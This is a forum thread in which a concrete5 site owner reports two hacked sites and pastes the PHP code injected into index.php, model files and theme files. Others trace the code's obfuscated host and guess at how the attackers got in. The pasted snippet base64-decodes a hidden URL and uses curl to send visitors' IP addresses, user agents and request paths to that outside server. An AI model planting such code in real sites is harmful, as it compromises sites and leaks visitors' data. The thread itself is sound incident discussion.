Sites hacked
Permalink
Hi all
Woke up to two site hacked, with this code inserted into index.php and various other files (/concrete/models/page.php and some theme files):
It's playing absolute havok with Firefox's resolution, and it seems to have stopped addFooterItem from working (bizarre).
Laurence
Woke up to two site hacked, with this code inserted into index.php and various other files (/concrete/models/page.php and some theme files):
<?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); $stCurlHandle = curl_init( $stCurlLink ); }
Viewing 15 lines of 28 lines. View entire code block.
It's playing absolute havok with Firefox's resolution, and it seems to have stopped addFooterItem from working (bizarre).
Laurence
I followed the hash and after a redirect it ends up athttp://botsvsbrowsers.com/
last news on the homepage was from 2010.
Its also basically impossible to track, the whois info turns up this site:
https://www.domainsbyproxy.com/Default.aspx...
Hope this helps.
last news on the homepage was from 2010.
Its also basically impossible to track, the whois info turns up this site:
https://www.domainsbyproxy.com/Default.aspx...
Hope this helps.
I searched for the some of the unique strings in the code and there is quite a bit of discussion around the web about it.
It doesn't seem to be a particularly malicious thing, but it does slow down sites to be unusable in Firefox, and in some cases it conflicts with itself and causes real problems.
I'm still not sure how it got in there, whether it was a XSS vulnerability or a server problem. We have maybe 8 concrete5 sites on the server but only two of them were hacked - that might suggest XSS. Who knows.
It doesn't seem to be a particularly malicious thing, but it does slow down sites to be unusable in Firefox, and in some cases it conflicts with itself and causes real problems.
I'm still not sure how it got in there, whether it was a XSS vulnerability or a server problem. We have maybe 8 concrete5 sites on the server but only two of them were hacked - that might suggest XSS. Who knows.
I have two sites(both hosted by Godaddy) that I manage. They both run on Joomla 1.7 CMS. I can't figure out how they got in. I'm suspecting bad security on the shared host?
Do you think a key logger/malware got your FTP passwords? Or they've been brute forced. I'd change the password or turn FTP off when not needed.